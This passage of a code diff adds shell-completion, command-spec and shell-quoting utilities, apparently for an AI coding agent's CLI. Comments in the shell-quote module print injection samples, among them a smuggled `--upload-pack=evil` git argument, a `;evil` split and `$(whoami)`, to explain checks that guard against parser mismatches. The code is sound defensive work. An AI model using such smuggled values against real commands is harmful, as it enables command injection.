+  const sharedCount = rest.reduce((limit, candidate) => {
+    const candidateWords = candidate.split(' ')
+    let matched = 0
+    while (
+      matched < limit &&
+      matched < candidateWords.length &&
+      headWords[matched] === candidateWords[matched]
+    ) {
+      matched++
+    }
+    return matched
+  }, headWords.length)
+
+  return headWords.slice(0, Math.max(1, sharedCount)).join(' ')
+}
@@ -0,0 +1,53 @@
+import { memoizeWithLRU } from '../memoize.js'
+import specs from './specs/index.js'
+
+// Description of a command: its name, nested subcommands, positional
+// arguments and options.
+export type CommandSpec = {
+  name: string
+  description?: string
+  subcommands?: CommandSpec[]
+  args?: Argument | Argument[]
+  options?: Option[]
+}
+
+// A positional argument of a command or of an option.
+export type Argument = {
+  name?: string
+  description?: string
+  isDangerous?: boolean
+  isVariadic?: boolean // repeats infinitely e.g. echo hello world
+  isOptional?: boolean
+  isCommand?: boolean // wrapper commands e.g. timeout, sudo
+  isModule?: string | boolean // for python -m and similar module args
+  isScript?: boolean // script files e.g. node script.js
+}
+
+// An option (flag) of a command; `name` is a single spelling or a list of
+// spellings.
+export type Option = {
+  name: string | string[]
+  description?: string
+  args?: Argument | Argument[]
+  isRequired?: boolean
+}
+
+/**
+ * Loads the spec for `command` from the `@withfig/autocomplete` build.
+ *
+ * The name is interpolated into a module path, so names that are empty,
+ * contain a path separator (`/` or `\`), contain `..`, or start with `-`
+ * (other than the bare `-`) are rejected up front.
+ *
+ * @param command - Command name to look up
+ * @returns The module's default export (or the module itself when it has
+ *   none), or null when the name is rejected or the import fails
+ */
+export async function loadFigSpec(
+  command: string,
+): Promise<CommandSpec | null> {
+  const rejected =
+    !command ||
+    command.includes('/') ||
+    command.includes('\\') ||
+    command.includes('..') ||
+    (command.startsWith('-') && command !== '-')
+  if (rejected) return null
+
+  try {
+    const loaded = await import(`@withfig/autocomplete/build/${command}.js`)
+    return loaded.default || loaded
+  } catch {
+    // Missing or unloadable spec module: treated as "no spec".
+    return null
+  }
+}
+/**
+ * Looks up the spec for a command: the bundled `specs` list is searched
+ * first for an exact name match, then `loadFigSpec` is tried; resolves to
+ * null when neither yields a spec.
+ *
+ * Wrapped in `memoizeWithLRU`; the second argument presumably supplies the
+ * cache key (the command name) — confirm against ../memoize.js.
+ */
+export const getCommandSpec = memoizeWithLRU(
+  async (command: string): Promise<CommandSpec | null> => {
+    const spec =
+      specs.find(s => s.name === command) ||
+      (await loadFigSpec(command)) ||
+      null
+    return spec
+  },
+  (command: string) => command,
+)
@@ -0,0 +1,259 @@
+import type { SuggestionItem } from 'src/components/PromptInput/PromptInputFooterSuggestions.js'
+import {
+  type ParseEntry,
+  quote,
+  tryParseShellCommand,
+} from '../bash/shellQuote.js'
+import { logForDebugging } from '../debug.js'
+import { getShellType } from '../localInstaller.js'
+import * as Shell from '../Shell.js'
+
+// Constants
+// Upper bound on the number of suggestions returned for one request.
+const MAX_SHELL_COMPLETIONS = 15
+// Timeout passed to Shell.exec for the completion command.
+const SHELL_COMPLETION_TIMEOUT_MS = 1000
+// Operators after which a new command is expected.
+const COMMAND_OPERATORS = ['|', '||', '&&', ';'] as const
+
+// What kind of thing is being completed.
+export type ShellCompletionType = 'command' | 'variable' | 'file'
+
+// The text to complete and the kind of completion to run for it.
+type InputContext = {
+  prefix: string
+  completionType: ShellCompletionType
+}
+
+/**
+ * Tells whether a parsed token is an operator object whose `op` is one of
+ * COMMAND_OPERATORS (|, ||, &&, ;). Plain string tokens never qualify.
+ */
+function isCommandOperator(token: ParseEntry): boolean {
+  if (typeof token !== 'object' || token === null) return false
+  if (!('op' in token)) return false
+  return (COMMAND_OPERATORS as readonly string[]).includes(token.op as string)
+}
+
+/**
+ * Classifies a prefix by its shape alone:
+ * - starts with `$` → variable
+ * - contains `/`, or starts with `~` or `.` → file
+ * - anything else → command
+ */
+function getCompletionTypeFromPrefix(prefix: string): ShellCompletionType {
+  if (prefix.startsWith('$')) return 'variable'
+
+  const looksLikePath =
+    prefix.includes('/') || prefix.startsWith('~') || prefix.startsWith('.')
+  return looksLikePath ? 'file' : 'command'
+}
+
+/**
+ * Scans the parsed tokens from the end and returns the last one that is a
+ * plain string, together with its position; null when there is none.
+ */
+function findLastStringToken(
+  tokens: ParseEntry[],
+): { token: string; index: number } | null {
+  for (let index = tokens.length - 1; index >= 0; index--) {
+    const token = tokens[index]
+    if (typeof token === 'string') return { token, index }
+  }
+  return null
+}
+
+/**
+ * Tells whether the token at `currentTokenIndex` sits where a new command
+ * is expected: at the very start of the input, or directly after a command
+ * operator.
+ */
+function isNewCommandContext(
+  tokens: ParseEntry[],
+  currentTokenIndex: number,
+): boolean {
+  const atStart = currentTokenIndex === 0
+  if (atStart) return true
+
+  const previous = tokens[currentTokenIndex - 1]
+  if (previous === undefined) return false
+  return isCommandOperator(previous)
+}
+
+/**
+ * Parse input to extract completion context.
+ *
+ * Only the text before the cursor is considered. The result names the
+ * prefix to complete and the kind of completion to run for it:
+ * - a trailing `$NAME` is always a variable completion;
+ * - if shell-quote cannot parse the text, it is split on whitespace and the
+ *   last piece is classified by its shape (a lone first word is a command);
+ * - with no string token at all, an empty command prefix is returned;
+ * - a trailing space means a new, empty file argument;
+ * - otherwise the last string token is used, classified by its shape and,
+ *   for command-like tokens, by whether it starts a new command.
+ *
+ * @param input - Full text of the input
+ * @param cursorOffset - Cursor position within `input`
+ * @returns The prefix to complete and the completion type
+ */
+function parseInputContext(input: string, cursorOffset: number): InputContext {
+  const beforeCursor = input.slice(0, cursorOffset)
+
+  // Check if it's a variable prefix, before expanding with shell-quote
+  const varMatch = beforeCursor.match(/\$[a-zA-Z_][a-zA-Z0-9_]*$/)
+  if (varMatch) {
+    return { prefix: varMatch[0], completionType: 'variable' }
+  }
+
+  // Parse with shell-quote
+  const parseResult = tryParseShellCommand(beforeCursor)
+  if (!parseResult.success) {
+    // Fallback to simple parsing
+    const tokens = beforeCursor.split(/\s+/)
+    const prefix = tokens[tokens.length - 1] || ''
+    const isFirstToken = tokens.length === 1 && !beforeCursor.includes(' ')
+    const completionType = isFirstToken
+      ? 'command'
+      : getCompletionTypeFromPrefix(prefix)
+    return { prefix, completionType }
+  }
+
+  // Extract current token
+  const lastToken = findLastStringToken(parseResult.tokens)
+  if (!lastToken) {
+    // No string token found (empty input or operators only): a command is
+    // expected either way, so there is nothing to branch on.
+    return { prefix: '', completionType: 'command' }
+  }
+
+  // If there's a trailing space, the user is starting a new argument
+  if (beforeCursor.endsWith(' ')) {
+    // After first token (command) with space = file argument expected
+    return { prefix: '', completionType: 'file' }
+  }
+
+  // Determine completion type from context
+  const baseType = getCompletionTypeFromPrefix(lastToken.token)
+
+  // If it's clearly a file or variable based on prefix, use that type
+  if (baseType === 'variable' || baseType === 'file') {
+    return { prefix: lastToken.token, completionType: baseType }
+  }
+
+  // For command-like tokens, check context: are we starting a new command?
+  const completionType = isNewCommandContext(
+    parseResult.tokens,
+    lastToken.index,
+  )
+    ? 'command'
+    : 'file' // Not after operator = file argument
+
+  return { prefix: lastToken.token, completionType }
+}
+
+/**
+ * Generate bash completion command using compgen.
+ *
+ * The word to complete is always passed after `--`. Without it, a typed
+ * word that starts with `-` would be parsed by compgen as options; compgen
+ * accepts the options of `complete`, including `-C command`, which runs a
+ * command.
+ *
+ * @param prefix - Text to complete (for variables, including the leading `$`)
+ * @param completionType - Kind of completion to generate
+ * @returns A bash command line that prints one candidate per line
+ */
+function getBashCompletionCommand(
+  prefix: string,
+  completionType: ShellCompletionType,
+): string {
+  if (completionType === 'variable') {
+    // Variable completion - remove $ prefix
+    const varName = prefix.slice(1)
+    return `compgen -v -- ${quote([varName])} 2>/dev/null`
+  } else if (completionType === 'file') {
+    // File completion with trailing slash for directories and trailing space for files
+    // Use 'while read' to prevent command injection from filenames containing newlines
+    return `compgen -f -- ${quote([prefix])} 2>/dev/null | head -${MAX_SHELL_COMPLETIONS} | while IFS= read -r f; do [ -d "$f" ] && echo "$f/" || echo "$f "; done`
+  } else {
+    // Command completion
+    return `compgen -c -- ${quote([prefix])} 2>/dev/null`
+  }
+}
+
+/**
+ * Builds the zsh command line that lists completion candidates, using
+ * native zsh parameter and glob expansion.
+ *
+ * @param prefix - Text to complete (for variables, including the leading `$`)
+ * @param completionType - Kind of completion to generate
+ * @returns A zsh command line that prints one candidate per line
+ */
+function getZshCompletionCommand(
+  prefix: string,
+  completionType: ShellCompletionType,
+): string {
+  switch (completionType) {
+    case 'variable': {
+      // Keys of the `parameters` table matching the name (without its `$`).
+      const varName = prefix.slice(1)
+      return `print -rl -- \${(k)parameters[(I)${quote([varName])}*]} 2>/dev/null`
+    }
+    case 'file':
+      // Glob expansion; directories get a trailing slash, files a trailing
+      // space. The glob qualifier caps the number of matches.
+      return `for f in ${quote([prefix])}*(N[1,${MAX_SHELL_COMPLETIONS}]); do [[ -d "$f" ]] && echo "$f/" || echo "$f "; done`
+    default:
+      // Keys of the `commands` table matching the prefix.
+      return `print -rl -- \${(k)commands[(I)${quote([prefix])}*]} 2>/dev/null`
+  }
+}
+
+/**
+ * Runs the completion command for the given shell and turns its output
+ * into suggestion items.
+ *
+ * Each non-blank stdout line becomes one suggestion, used as both its id
+ * and its display text; at most MAX_SHELL_COMPLETIONS are returned.
+ *
+ * @param shellType - Shell whose completion syntax to use
+ * @param prefix - Text to complete
+ * @param completionType - Kind of completion to run
+ * @param abortSignal - Signal forwarded to Shell.exec
+ * @returns The suggestions, each tagged with `completionType` in its metadata
+ */
+async function getCompletionsForShell(
+  shellType: 'bash' | 'zsh',
+  prefix: string,
+  completionType: ShellCompletionType,
+  abortSignal: AbortSignal,
+): Promise<SuggestionItem[]> {
+  // Defensive guard for unsupported shell types.
+  if (shellType !== 'bash' && shellType !== 'zsh') {
+    return []
+  }
+
+  const command =
+    shellType === 'bash'
+      ? getBashCompletionCommand(prefix, completionType)
+      : getZshCompletionCommand(prefix, completionType)
+
+  const running = await Shell.exec(command, abortSignal, 'bash', {
+    timeout: SHELL_COMPLETION_TIMEOUT_MS,
+  })
+  const outcome = await running.result
+
+  const suggestions: SuggestionItem[] = []
+  for (const line of outcome.stdout.split('\n') as string[]) {
+    if (suggestions.length >= MAX_SHELL_COMPLETIONS) break
+    if (!line.trim()) continue
+    suggestions.push({
+      id: line,
+      displayText: line,
+      description: undefined,
+      metadata: { completionType },
+    })
+  }
+  return suggestions
+}
+
+/**
+ * Produces shell completions for the text before the cursor.
+ * Only bash and zsh are supported (matches Shell.ts execution support);
+ * any other shell yields no suggestions.
+ *
+ * @param input - Full text of the input
+ * @param cursorOffset - Cursor position within `input`
+ * @param abortSignal - Signal used to cancel the underlying shell command
+ * @returns Suggestions whose metadata carries the completion type and a
+ *   snapshot of `input`; an empty list when there is nothing to complete
+ *   or when anything fails
+ */
+export async function getShellCompletions(
+  input: string,
+  cursorOffset: number,
+  abortSignal: AbortSignal,
+): Promise<SuggestionItem[]> {
+  const shellType = getShellType()
+  if (shellType !== 'bash' && shellType !== 'zsh') {
+    return []
+  }
+
+  try {
+    const context = parseInputContext(input, cursorOffset)
+    if (!context.prefix) {
+      return []
+    }
+
+    const completions = await getCompletionsForShell(
+      shellType,
+      context.prefix,
+      context.completionType,
+      abortSignal,
+    )
+
+    // Stamp every suggestion with the input it was computed for, so callers
+    // can detect when the input has changed since.
+    return completions.map(suggestion => {
+      const existing = suggestion.metadata as {
+        completionType: ShellCompletionType
+      }
+      return {
+        ...suggestion,
+        metadata: { ...existing, inputSnapshot: input },
+      }
+    })
+  } catch (error) {
+    // Best effort: log and report no suggestions.
+    logForDebugging(`Shell completion failed: ${error}`)
+    return []
+  }
+}
@@ -0,0 +1,28 @@
+import { quote } from './shellQuote.js'
+
+/**
+ * Builds a command line from a shell prefix (executable path plus optional
+ * flags) and the command that shell should run.
+ *
+ * The prefix is split at its LAST " -" occurrence: everything before it is
+ * treated as the executable and quoted, everything from the dash onwards is
+ * appended verbatim as flags. A prefix without " -" is quoted as a whole.
+ *
+ * Examples:
+ * - "bash" -> 'bash' <quoted command>
+ * - "/usr/bin/bash -c" -> '/usr/bin/bash' -c <quoted command>
+ * - "C:\Program Files\Git\bin\bash.exe -c" -> 'C:\Program Files\Git\bin\bash.exe' -c <quoted command>
+ *
+ * @param prefix The shell prefix string containing executable and optional arguments
+ * @param command The command to be executed
+ * @returns The formatted command string with quoted executable and command
+ */
+export function formatShellPrefixCommand(
+  prefix: string,
+  command: string,
+): string {
+  const flagBoundary = prefix.lastIndexOf(' -')
+
+  // No " -" (or only at index 0): the whole prefix is the executable.
+  if (flagBoundary <= 0) {
+    return `${quote([prefix])} ${quote([command])}`
+  }
+
+  const executable = prefix.substring(0, flagBoundary)
+  // Skip the separating space so the flags start at the dash.
+  const flags = prefix.substring(flagBoundary + 1)
+  return `${quote([executable])} ${flags} ${quote([command])}`
+}
@@ -0,0 +1,304 @@
+/**
+ * Safe wrappers for shell-quote library functions that handle errors gracefully
+ * These are drop-in replacements for the original functions
+ */
+
+import {
+  type ParseEntry,
+  parse as shellQuoteParse,
+  quote as shellQuoteQuote,
+} from 'shell-quote'
+import { logError } from '../log.js'
+import { jsonStringify } from '../slowOperations.js'
+
+export type { ParseEntry } from 'shell-quote'
+
+export type ShellParseResult =
+  | { success: true; tokens: ParseEntry[] }
+  | { success: false; error: string }
+
+export type ShellQuoteResult =
+  | { success: true; quoted: string }
+  | { success: false; error: string }
+
+/**
+ * Non-throwing wrapper around shell-quote's `parse`.
+ *
+ * @param cmd Command string to tokenize
+ * @param env Optional variable source: a lookup table or a lookup function
+ * @returns `{ success: true, tokens }` on success; otherwise
+ *   `{ success: false, error }` where `error` is the thrown Error's message
+ *   (or 'Unknown parse error' for non-Error throwables). Thrown Errors are
+ *   also passed to logError.
+ */
+export function tryParseShellCommand(
+  cmd: string,
+  env?:
+    | Record<string, string | undefined>
+    | ((key: string) => string | undefined),
+): ShellParseResult {
+  try {
+    // Both branches make the same call; the split only narrows `env`
+    // (NOTE(review): presumably so each call matches a single overload of
+    // shell-quote's typings — confirm).
+    if (typeof env === 'function') {
+      return { success: true, tokens: shellQuoteParse(cmd, env) }
+    }
+    return { success: true, tokens: shellQuoteParse(cmd, env) }
+  } catch (error) {
+    if (!(error instanceof Error)) {
+      return { success: false, error: 'Unknown parse error' }
+    }
+    logError(error)
+    return { success: false, error: error.message }
+  }
+}
+
+/**
+ * Non-throwing, strictly validating wrapper around shell-quote's `quote`.
+ *
+ * Strings pass through unchanged; numbers, booleans, null and undefined are
+ * converted with String(). Every other value type is rejected.
+ *
+ * @param args Values to quote
+ * @returns `{ success: true, quoted }`, or `{ success: false, error }` when an
+ *   argument has an unsupported type or quoting throws. Thrown Errors are
+ *   also passed to logError.
+ */
+export function tryQuoteShellArgs(args: unknown[]): ShellQuoteResult {
+  try {
+    const validated: string[] = args.map((arg, index) => {
+      if (arg === null || arg === undefined) {
+        return String(arg)
+      }
+
+      const kind = typeof arg
+      switch (kind) {
+        case 'string':
+          return arg as string
+        case 'number':
+        case 'boolean':
+          return String(arg)
+        case 'object':
+        case 'symbol':
+        case 'function':
+          throw new Error(
+            `Cannot quote argument at index ${index}: ${kind} values are not supported`,
+          )
+        default:
+          // Whatever typeof value is left over.
+          throw new Error(
+            `Cannot quote argument at index ${index}: unsupported type ${kind}`,
+          )
+      }
+    })
+
+    return { success: true, quoted: shellQuoteQuote(validated) }
+  } catch (error) {
+    if (!(error instanceof Error)) {
+      return { success: false, error: 'Unknown quote error' }
+    }
+    logError(error)
+    return { success: false, error: error.message }
+  }
+}
+
+/**
+ * Reports whether a command, or the tokens shell-quote produced for it, look
+ * malformed — a sign that shell-quote interpreted ambiguous input (such as
+ * JSON-like strings containing semicolons) by shell rules and split it into
+ * fragments.
+ *
+ * Example: `echo {"hi":"hi;evil"}` is parsed with `;` as an operator, which
+ * yields a fragment like `{hi:"hi` with an unbalanced brace. Legitimate
+ * commands produce complete, balanced tokens.
+ *
+ * Two checks are performed:
+ * 1. Raw command: unterminated quotes. shell-quote silently drops an
+ *    unmatched `"` or `'` and parses the rest as unquoted, leaving no trace
+ *    in the tokens. `echo "hi;evil | cat` is a bash syntax error, yet
+ *    shell-quote returns clean tokens with `;` as an operator, so the raw
+ *    string has to be walked with bash quote semantics.
+ * 2. Each string token: unbalanced `{}`, `()`, `[]`, or an odd number of
+ *    `"` / `'` characters that are not preceded by a backslash.
+ *
+ * Security: This prevents command injection via HackerOne #3482049 where
+ * shell-quote's correct parsing of ambiguous input can be exploited.
+ *
+ * @param command The original command string
+ * @param parsed Tokens produced by shell-quote for `command`
+ * @returns true when either check finds a problem
+ */
+export function hasMalformedTokens(
+  command: string,
+  parsed: ParseEntry[],
+): boolean {
+  // Check 1: walk the raw command. Outside single quotes a backslash escapes
+  // the following character; inside single quotes nothing is escaped.
+  let insideSingle = false
+  let insideDouble = false
+  let pos = 0
+  while (pos < command.length) {
+    const ch = command[pos]
+    if (ch === '\\' && !insideSingle) {
+      // Skip the backslash and the character it escapes.
+      pos += 2
+      continue
+    }
+    if (ch === '"' && !insideSingle) {
+      insideDouble = !insideDouble
+    } else if (ch === "'" && !insideDouble) {
+      insideSingle = !insideSingle
+    }
+    pos++
+  }
+  // A quote that is still open at the end means an odd number of quote toggles.
+  if (insideDouble || insideSingle) return true
+
+  const countMatches = (token: string, pattern: RegExp): number =>
+    (token.match(pattern) || []).length
+
+  // Check 2: every string token must be balanced on its own.
+  for (const entry of parsed) {
+    if (typeof entry !== 'string') continue
+
+    // Curly braces
+    if (countMatches(entry, /{/g) !== countMatches(entry, /}/g)) return true
+
+    // Parentheses
+    if (countMatches(entry, /\(/g) !== countMatches(entry, /\)/g)) return true
+
+    // Square brackets
+    if (countMatches(entry, /\[/g) !== countMatches(entry, /\]/g)) return true
+
+    // Double quotes not preceded by a backslash must come in pairs.
+    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by hasCommandSeparator check at caller, runs on short per-token strings
+    if (countMatches(entry, /(?<!\\)"/g) % 2 !== 0) return true
+
+    // Same rule for single quotes.
+    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
+    if (countMatches(entry, /(?<!\\)'/g) % 2 !== 0) return true
+  }
+  return false
+}
+
+/**
+ * Detects commands whose single-quoted strings end in backslashes in a way
+ * that makes the shell-quote library disagree with bash.
+ *
+ * In bash, single quotes preserve ALL characters literally — a backslash has
+ * no special meaning, so '\' is simply the string \ (quote opens, contains \,
+ * next ' closes). shell-quote instead treats \ as an escape character inside
+ * single quotes, so for it '\' does NOT close the quoted string.
+ *
+ * As a result the pattern '\' <payload> '\' hides <payload> from security
+ * checks, because shell-quote believes it is all one single-quoted string.
+ *
+ * @param command The raw command string
+ * @returns true when a single-quoted string closes right after backslashes in
+ *   one of the configurations described in the function body
+ */
+export function hasShellQuoteSingleQuoteBug(command: string): boolean {
+  // Track quote state with bash semantics while scanning left to right.
+  let insideSingle = false
+  let insideDouble = false
+  let pos = 0
+
+  while (pos < command.length) {
+    const ch = command[pos]
+
+    // Outside single quotes a backslash escapes the next character: skip both.
+    if (ch === '\\' && !insideSingle) {
+      pos += 2
+      continue
+    }
+
+    if (ch === '"' && !insideSingle) {
+      insideDouble = !insideDouble
+    } else if (ch === "'" && !insideDouble) {
+      insideSingle = !insideSingle
+
+      // We only care about the moment a single-quoted string CLOSES with
+      // backslashes directly in front of the closing quote. shell-quote's
+      // chunker regex '((\\'|[^'])*?)' wrongly reads \' as an escape sequence
+      // inside single quotes, whereas bash keeps the backslash literal. That
+      // differential lets shell-quote merge tokens bash keeps separate.
+      //
+      // Odd number of trailing backslashes = always a bug:
+      //   '\'    -> shell-quote: \' = literal ', still open. bash: \, closed.
+      //   'abc\' -> shell-quote: abc then \' = literal ', still open. bash: abc\, closed.
+      //   '\\\'  -> shell-quote: \\ + \', still open. bash: \\\, closed.
+      //
+      // Even number of trailing backslashes = bug ONLY if a later ' exists:
+      //   '\\' alone   -> shell-quote backtracks; both parsers agree. OK.
+      //   '\\' 'next'  -> shell-quote: \' swallows the closing ', then uses the
+      //                   next ' as a false close and merges tokens.
+      //                   bash: two separate tokens.
+      //
+      //   Detail: the alternation tries \' before [^']. For '\\' it matches the
+      //   first \ via [^'] (the next char is \, not '), then the second \ via \'
+      //   (the next char IS '), consuming the closing quote. The regex keeps
+      //   reading until another ' closes the match. With no further ' it
+      //   backtracks to [^'] for the second \ and closes correctly; with one
+      //   (e.g. the opener of the next single-quoted arg) it never backtracks
+      //   and the tokens merge. See H1 report:
+      //   git ls-remote 'safe\\' '--upload-pack=evil' 'repo'
+      //   shell-quote: ["git","ls-remote","safe\\\\ --upload-pack=evil repo"]
+      //   bash:        ["git","ls-remote","safe\\\\","--upload-pack=evil","repo"]
+      if (!insideSingle) {
+        let trailingBackslashes = 0
+        for (
+          let back = pos - 1;
+          back >= 0 && command[back] === '\\';
+          back--
+        ) {
+          trailingBackslashes++
+        }
+
+        if (trailingBackslashes > 0) {
+          if (trailingBackslashes % 2 === 1) {
+            return true
+          }
+          // Even count: ANY later ' counts, because the chunker regex ignores
+          // bash quote state (a ' inside double quotes is consumable too).
+          if (command.indexOf("'", pos + 1) !== -1) {
+            return true
+          }
+        }
+      }
+    }
+
+    pos++
+  }
+
+  return false
+}
+
+/**
+ * Shell-quotes a list of values, tolerating non-string input.
+ *
+ * Strict validation (tryQuoteShellArgs) is attempted first. If it fails, a
+ * lenient pass stringifies every value — primitives, null and undefined via
+ * String(), everything else via jsonStringify — and hands the strings to
+ * shell-quote, so the final output is still produced by the shell quoter.
+ *
+ * @param args Values to quote
+ * @returns The quoted argument string
+ * @throws Error('Failed to quote shell arguments safely') when the lenient
+ *   pass throws as well
+ */
+export function quote(args: ReadonlyArray<unknown>): string {
+  const strict = tryQuoteShellArgs([...args])
+  if (strict.success) {
+    return strict.quoted
+  }
+
+  // Strict validation rejected something (object, symbol, function, ...):
+  // retry with every value coerced to a string first.
+  try {
+    const coerced = args.map(arg => {
+      const isSimple =
+        arg === null ||
+        arg === undefined ||
+        typeof arg === 'string' ||
+        typeof arg === 'number' ||
+        typeof arg === 'boolean'
+
+      // Unsupported types get a JSON representation instead of crashing; the
+      // result is still passed through the shell quoter below.
+      return isSimple ? String(arg) : jsonStringify(arg)
+    })
+
+    return shellQuoteQuote(coerced)
+  } catch (error) {
+    // SECURITY: Never use JSON.stringify as a fallback for shell quoting.
+    // JSON.stringify uses double quotes which don't prevent shell command execution.
+    // For example, jsonStringify(['echo', '$(whoami)']) produces "echo" "$(whoami)"
+    if (error instanceof Error) {
+      logError(error)
+    }
+    throw new Error('Failed to quote shell arguments safely')
+  }
+}
@@ -0,0 +1,128 @@
+import { quote } from './shellQuote.js'
+
+/**
+ * Reports whether a command contains a heredoc operator.
+ * Recognized forms: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF, etc.
+ *
+ * Commands that contain something looking like a bit shift (`1 << 2`,
+ * `[[ 1 << 2 ]]`, `$(( ... << ... ))`) are reported as heredoc-free without
+ * looking any further.
+ */
+function containsHeredoc(command: string): boolean {
+  // Bit-shift look-alikes are ruled out first.
+  const digitShift = /\d\s*<<\s*\d/
+  const bracketShift = /\[\[\s*\d+\s*<<\s*\d+\s*\]\]/
+  const arithmeticShift = /\$\(\(.*<<.*\)\)/
+  if (digitShift.test(command)) return false
+  if (bracketShift.test(command)) return false
+  if (arithmeticShift.test(command)) return false
+
+  // `<<`, optional `-`, optional whitespace, then either a word wrapped in
+  // matching optional quotes or a backslash-prefixed word.
+  return /<<-?\s*(?:(['"]?)(\w+)\1|\\(\w+))/.test(command)
+}
+
+/**
+ * Reports whether a command contains a quoted span with a literal newline
+ * between its quote characters.
+ */
+function containsMultilineString(command: string): boolean {
+  // Each pattern: opening quote, any run of "non-quote, non-backslash char"
+  // or "backslash + any char" (so \' / \" do not end the span), a newline,
+  // another such run, then the closing quote.
+  const multilineSingleQuoted = /'(?:[^'\\]|\\.)*\n(?:[^'\\]|\\.)*'/
+  if (multilineSingleQuoted.test(command)) {
+    return true
+  }
+
+  const multilineDoubleQuoted = /"(?:[^"\\]|\\.)*\n(?:[^"\\]|\\.)*"/
+  return multilineDoubleQuoted.test(command)
+}
+
+/**
+ * Quotes a whole shell command as a single argument, with special handling
+ * for heredocs and multiline quoted strings.
+ *
+ * - Heredoc: the command is wrapped in single quotes by hand and never gets
+ *   a stdin redirect (the heredoc supplies its own input).
+ * - Multiline quoted string: wrapped in single quotes by hand; ` < /dev/null`
+ *   is appended when requested.
+ * - Anything else: quoted through the shell-quote wrapper, with `<` and
+ *   `/dev/null` passed as further arguments when requested.
+ *
+ * @param command The command to quote
+ * @param addStdinRedirect Whether to add < /dev/null
+ * @returns The quoted command
+ */
+export function quoteShellCommand(
+  command: string,
+  addStdinRedirect: boolean = true,
+): string {
+  const hasHeredoc = containsHeredoc(command)
+
+  // Regular commands go through shell-quote.
+  if (!hasHeredoc && !containsMultilineString(command)) {
+    return addStdinRedirect
+      ? quote([command, '<', '/dev/null'])
+      : quote([command])
+  }
+
+  // The shell-quote library incorrectly escapes ! to \! in these cases, so
+  // wrap in single quotes manually; an embedded ' is emitted as '"'"'
+  // (close quote, double-quoted ', reopen quote).
+  const wrapped = `'${command.replace(/'/g, "'\"'\"'")}'`
+
+  if (hasHeredoc || !addStdinRedirect) {
+    return wrapped
+  }
+  return `${wrapped} < /dev/null`
+}
+
+/**
+ * Reports whether a command already redirects stdin from a file.
+ * Matches forms like `< file`, `</path/to/file`, `< /dev/null`.
+ * Does not match `<<EOF` (heredoc), `<<` (bit shift) or `<(` (process
+ * substitution).
+ */
+export function hasStdinRedirect(command: string): boolean {
+  // `<` must sit at the start of the string or right after whitespace or one
+  // of ; & |, must not be followed by another `<` or by `(`, and must be
+  // followed (after optional whitespace) by at least one non-space character.
+  const stdinRedirectPattern = /(?:^|[\s;&|])<(?![<(])\s*\S+/
+  return stdinRedirectPattern.test(command)
+}
+
+/**
+ * Decides whether a stdin redirect may be appended to a command.
+ *
+ * The answer is no when the command contains a heredoc (a redirect would
+ * interfere with the heredoc terminator) or already has a stdin redirect of
+ * its own; otherwise adding one is considered safe.
+ *
+ * @param command The command to check
+ * @returns true if stdin redirect can be safely added
+ */
+export function shouldAddStdinRedirect(command: string): boolean {
+  const blockedByHeredoc = containsHeredoc(command)
+  return !blockedByHeredoc && !hasStdinRedirect(command)
+}
+
+/**
+ * Pattern for Windows CMD-style redirects to `nul`.
+ *
+ * Group 1 captures the redirect operator (optional fd digit, optional `&`,
+ * one or more `>`, optional whitespace). `nul` is matched case-insensitively
+ * and must be followed by whitespace, end of input, or one of | & ; ) so that
+ * longer words are left alone.
+ *
+ * Matches: `>nul`, `> NUL`, `2>nul`, `&>nul`, `>>nul` (case-insensitive)
+ * Does NOT match: `>null`, `>nullable`, `>nul.txt`, `cat nul.txt`
+ */
+const NUL_REDIRECT_REGEX = /(\d?&?>+\s*)[Nn][Uu][Ll](?=\s|$|[|&;)\n])/g
+
+/**
+ * Rewrites Windows CMD-style `>nul` redirects to POSIX `/dev/null`.
+ *
+ * The model occasionally hallucinates Windows CMD syntax (e.g., `ls 2>nul`)
+ * even though our bash shell is always POSIX (Git Bash / WSL on Windows).
+ * When Git Bash sees `2>nul`, it creates a literal file named `nul` — a
+ * Windows reserved device name that is extremely hard to delete and breaks
+ * `git add .` and `git clone`. See anthropics/claude-code#4928.
+ *
+ * Limitation: shell quoting is not parsed, so `echo ">nul"` is rewritten as
+ * well. This is accepted collateral — it is extremely rare, and a
+ * `/dev/null` inside a string is harmless.
+ *
+ * @param command Command text to rewrite
+ * @returns The command with every matching `nul` target replaced by `/dev/null`
+ */
+export function rewriteWindowsNullRedirect(command: string): string {
+  return command.replace(
+    NUL_REDIRECT_REGEX,
+    (_match: string, redirectOperator: string) =>
+      `${redirectOperator}/dev/null`,
+  )
+}
@@ -0,0 +1,14 @@
+import type { CommandSpec } from '../registry.js'
+
+const alias: CommandSpec = { // Spec entry describing the `alias` command
+  name: 'alias',
+  description: 'Create or list command aliases',
+  args: {
+    name: 'definition',
+    description: 'Alias definition in the form name=value',
+    isOptional: true, // a definition may be omitted (the description above also covers listing)
+    isVariadic: true, // NOTE(review): presumably allows several definitions in one call — confirm against CommandSpec in registry.js
+  },
+}
+
+export default alias
@@ -0,0 +1,18 @@
+import type { CommandSpec } from '../registry.js'
+import alias from './alias.js'
+import nohup from './nohup.js'
+import pyright from './pyright.js'
+import sleep from './sleep.js'
+import srun from './srun.js'
+import time from './time.js'
+import timeout from './timeout.js'
+
+export default [ // Collects the individual command specs imported above into one list
+  pyright,
+  timeout,
+  sleep,
+  alias,
+  nohup,
+  time,
+  srun,
+] satisfies CommandSpec[] // type-checks every entry against CommandSpec
@@ -0,0 +1,13 @@
+import type { CommandSpec } from '../registry.js'
+
+const nohup: CommandSpec = { // Spec entry describing the `nohup` wrapper command
+  name: 'nohup',
+  description: 'Run a command immune to hangups',
+  args: {
+    name: 'command',
+    description: 'Command to run with nohup',
+    isCommand: true, // NOTE(review): presumably marks this argument as a nested command line — confirm against CommandSpec in registry.js
+  },
+}
+
+export default nohup
@@ -0,0 +1,91 @@
+import type { CommandSpec } from '../registry.js'
+
+export default { // Spec describing the pyright CLI: its options and positional file arguments
+  name: 'pyright',
+  description: 'Type checker for Python',
+  options: [ // an option with an `args` entry takes a value; the others are plain flags
+    { name: ['--help', '-h'], description: 'Show help message' },
+    { name: '--version', description: 'Print pyright version and exit' },
+    {
+      name: ['--watch', '-w'],
+      description: 'Continue to run and watch for changes',
+    },
+    {
+      name: ['--project', '-p'],
+      description: 'Use the configuration file at this location',
+      args: { name: 'FILE OR DIRECTORY' },
+    },
+    { name: '-', description: 'Read file or directory list from stdin' },
+    {
+      name: '--createstub',
